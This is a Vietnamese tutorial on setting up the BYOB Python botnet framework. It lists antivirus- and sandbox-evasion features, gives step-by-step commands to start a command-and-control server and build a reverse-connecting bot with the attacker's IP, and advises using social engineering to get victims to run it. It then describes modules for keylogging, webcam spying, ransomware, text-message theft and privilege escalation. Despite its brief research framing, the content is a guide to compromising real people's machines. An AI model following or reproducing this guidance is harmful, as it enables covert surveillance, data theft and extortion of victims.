Computer >> Máy Tính >  >> Lập trình >> Python

Xây dựng Botnet của riêng bạn

BYOB cung cấp một khuôn khổ cho các nhà nghiên cứu và nhà phát triển bảo mật để xây dựng và vận hành một mạng botnet cơ bản nhằm nâng cao hiểu biết của họ về phần mềm độc hại tinh vi lây nhiễm hàng triệu thiết bị mỗi năm sinh ra các mạng botnet hiện đại, nhằm cải thiện khả năng phát triển các biện pháp đối phó với những mối đe dọa này. Nó được thiết kế để cho phép các nhà phát triển dễ dàng triển khai mã của riêng họ và thêm các tính năng mới thú vị mà không cần phải viết máy chủ RAT hoặc Command &Control từ đầu.

Tính năng

  • Không có gì được ghi vào đĩa - máy khách không bao giờ ghi bất cứ thứ gì vào đĩa - thậm chí không phải là các tệp tạm thời vì nhập từ xa cho phép mã tùy ý được tải động vào bộ nhớ và được nhập trực tiếp vào quy trình hiện đang chạy.

  • Nền tảng độc lập - mọi thứ đều được viết bằng Python và các ứng dụng khách được tạo có thể tùy chọn được biên dịch thành tệp thực thi di động (Windows) hoặc được đóng gói thành một ứng dụng độc lập.

  • Bỏ qua tường lửa - máy khách kết nối với máy chủ lệnh &điều khiển thông qua kết nối TCP ngược, điều này sẽ vượt qua hầu hết các tường lửa vì cấu hình bộ lọc mặc định chủ yếu chặn các kết nối đến.

  • Phản biện pháp chống lại phần mềm chống vi-rút - tránh bị phân tích bởi phần mềm chống vi-rút bằng cách chặn các quy trình có tên của các sản phẩm chống vi-rút đã biết từ việc sinh sản.

  • Mã hóa tải trọng để ngăn phân tích - tải trọng của máy khách chính được mã hóa bằng khóa 256 bit ngẫu nhiên chỉ tồn tại trong bộ đếm trọng tải được tạo cùng với nó.

  • Ngăn chặn kỹ thuật đảo ngược - theo mặc định, máy khách sẽ hủy thực thi nếu máy ảo hoặc hộp cát được phát hiện.

Cách cài đặt

  • git clone https://github.com/malwaredllc/byob.git

  • cd byob

  • pip install -r tests.txt

  • python setup.py

    Ở đây hai thiết bị đầu cuối sẽ được sử dụng; thiết bị đầu cuối đầu tiên sẽ là Máy chủ Bot, nơi các phiên sẽ được xử lý và thiết bị đầu cuối thứ hai là Máy khách Bot nơi các bot sẽ được tạo.

  • python server.py –port 445

    Sau đó, mở một thiết bị đầu cuối linux khác và Nhập cd / home / cybersecurity / Downloads / byob / byob

  • python client.py –name testbot.py 192.168.1.10 (ip của kẻ tấn công) 445

Sau khi thực hiện truy vấn trên, một mạng botnet mới sẽ được tạo. Truy vấn trên sẽ thực thi. Bây giờ, bạn có thể sử dụng bất kỳ thủ thuật kỹ thuật xã hội nào để mở bot trong máy tính của họ. Khi testbot.py được thực thi trong máy đích, một phiên sẽ được tạo trong máy chủ botnet.

Khai thác bài

Các mô-đun sau khai thác, những mô-đun này được khách hàng có thể nhập từ xa sau khi cấu hình thành công mạng botnet trong nạn nhân.

  • Keylogger (byob.modules.keylogger):ghi lại các lần gõ phím của người dùng và tên cửa sổ đã nhập

  • Ảnh chụp màn hình (byob.modules.screenshot):chụp ảnh màn hình máy tính để bàn của người dùng hiện tại

  • Webcam (byob.modules.webcam):xem luồng trực tiếp hoặc chụp ảnh / video từ webcam

  • Ransom (byob.modules.ransom):mã hóa tệp và tạo ví BTC ngẫu nhiên để thanh toán tiền chuộc

  • Packet Sniffer (byob.modules.packetsniffer):chạy trình kiểm tra gói trên mạng chủ và tệp upload.pcap

  • Tính bền bỉ (byob.modules.persistence):thiết lập tính ổn định trên máy chủ

  • Điện thoại (byob.modules.phone):đọc / tìm kiếm / tải lên tin nhắn văn bản từ điện thoại thông minh của khách hàng

  • Đặc quyền leo thang (byob.modules.escalate):cố gắng bỏ qua UAC để giành được đặc quyền quản trị viên trái phép

  • Máy quét cổng (byob.modules.portscanner):quét mạng cục bộ để tìm các thiết bị trực tuyến khác và các cổng đang mở

  • Kiểm soát quy trình (byob.modules.process):danh sách / tìm kiếm / tiêu diệt / giám sát các quy trình hiện đang chạy trên máy chủ lưu trữ